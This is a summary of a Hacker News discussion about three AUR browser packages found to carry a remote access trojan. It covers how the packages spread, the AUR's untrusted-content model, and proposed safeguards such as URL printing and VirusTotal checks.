Firefox-patch-bin, librewolf-fix-bin AUR packages contain malware

Original Article ↗ Hacker News Discussion ↗

Incident and Impact

  • Three AUR packages — librewolf-fix-bin, firefox-patch-bin, zen-browser-patched-bin — were found to contain a remote access trojan (RAT) that gives full control of the machine to the attacker.
  • Packages existed only a few days before removal; they were new, not compromises of the popular librewolf-bin or zen-browser-bin.
  • Several comments argue that with a RAT there is no reliable cleanup: the only safe response is to assume total compromise, take machines offline, back up data, and fully reinstall.

Information Gap and Indicators of Compromise

  • Some participants criticize the advisory for not listing technical indicators (files, startup entries, etc.) that would help users check systems.
  • Others counter that Arch’s priority is rapid notification; a full malware analysis is unrealistic, and a RAT may leave few or no consistent traces, especially if payloads are dumped to /tmp and cleaned up or actions vary per host.

How the Attack Worked

  • The AUR PKGBUILDs pulled code from a GitHub repo; a Python script downloaded a binary payload later uploaded to VirusTotal.
  • One package declared provides=('firefox'), so many existing packages that depend on firefox appeared as “dependents”, likely to increase visibility.
  • At least one Reddit post promoted the malicious zen-browser-patched-bin as a “great find”, suggesting deliberate social engineering.

AUR Trust Model and User Responsibility

  • Repeated emphasis that AUR is explicitly “untrusted user content”: anyone can upload, packages are not vetted, and users are expected to read PKGBUILDs before building.
  • Arch’s official tools (pacman) do not interact with AUR; third‑party “helpers” (yay, paru, etc.) simply automate fetching PKGBUILDs and usually show PKGBUILD/diffs before building.
  • Disagreement over real‑world behavior: some claim most Arch users install from AUR “without a second thought”; others dispute this and view AUR use as inherently “at your own risk”.

Proposals for Better Safeguards

  • Suggestions: tools to print all URLs in PKGBUILDs, highlight diffs on update, or summarize new commits to make manual review easier. Helpers already do some of this; printing URLs is seen as a useful extra.
  • Proposals to integrate LLMs for malware review are widely rejected as impractical (high false positives, easy to game).
  • VirusTotal integration into pacman -U is proposed; pushback focuses on privacy, limited usefulness against new malware, high API load, and conflict with Arch’s ethos of minimalism and user control.

Broader Reflections

  • Several note that similar risks exist in other ecosystems (Fedora COPR, Plasma widget store, npm, etc.).
  • Some express nervousness and plan audits of third‑party repos; others frame the quick detection (within ~2 days) as evidence the AUR community is actively policing new uploads.